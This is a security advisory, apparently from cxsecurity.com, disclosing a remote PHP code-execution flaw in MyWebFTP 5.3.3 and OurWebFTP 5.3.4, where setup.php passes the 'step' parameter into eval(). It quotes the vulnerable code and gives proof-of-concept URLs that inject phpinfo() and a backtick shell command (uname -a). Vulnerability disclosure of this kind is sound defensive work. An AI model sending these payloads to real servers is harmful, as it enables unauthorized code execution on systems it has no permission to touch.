MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability

2012.07.24
Credit: condis
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-94

MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability by condis 04.10.2011 download: http://www.mywebftp.com/download.php http://www.ourwebftp.com/download.php Source of setup.php: 30. start_html(); 31. if( checkReady() ){ [1] 32. init(); 33. listSetupOptions(); 34. if ( isset($_REQUEST['step']) ){ 35. $step = $_REQUEST['step']; 36. eval("step_$step();"); [!] 37. } To exploit this issue, everything must be configured propely so that installation can be done without any errors [1]. To meet these conditions all you have to do is make sure that there is directory with name defined in LD_DIR const with permission to write into it, and that the administrator haven't deleted setup.php Proof of Concept: http://host.tld/myftpdir/setup.php?step=;phpinfo();// http://host.tld/myftpdir/setup.php?step=;print_r(`uname -a`);//

References:

http://www.mywebftp.com/download.php
http://www.ourwebftp.com/download.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top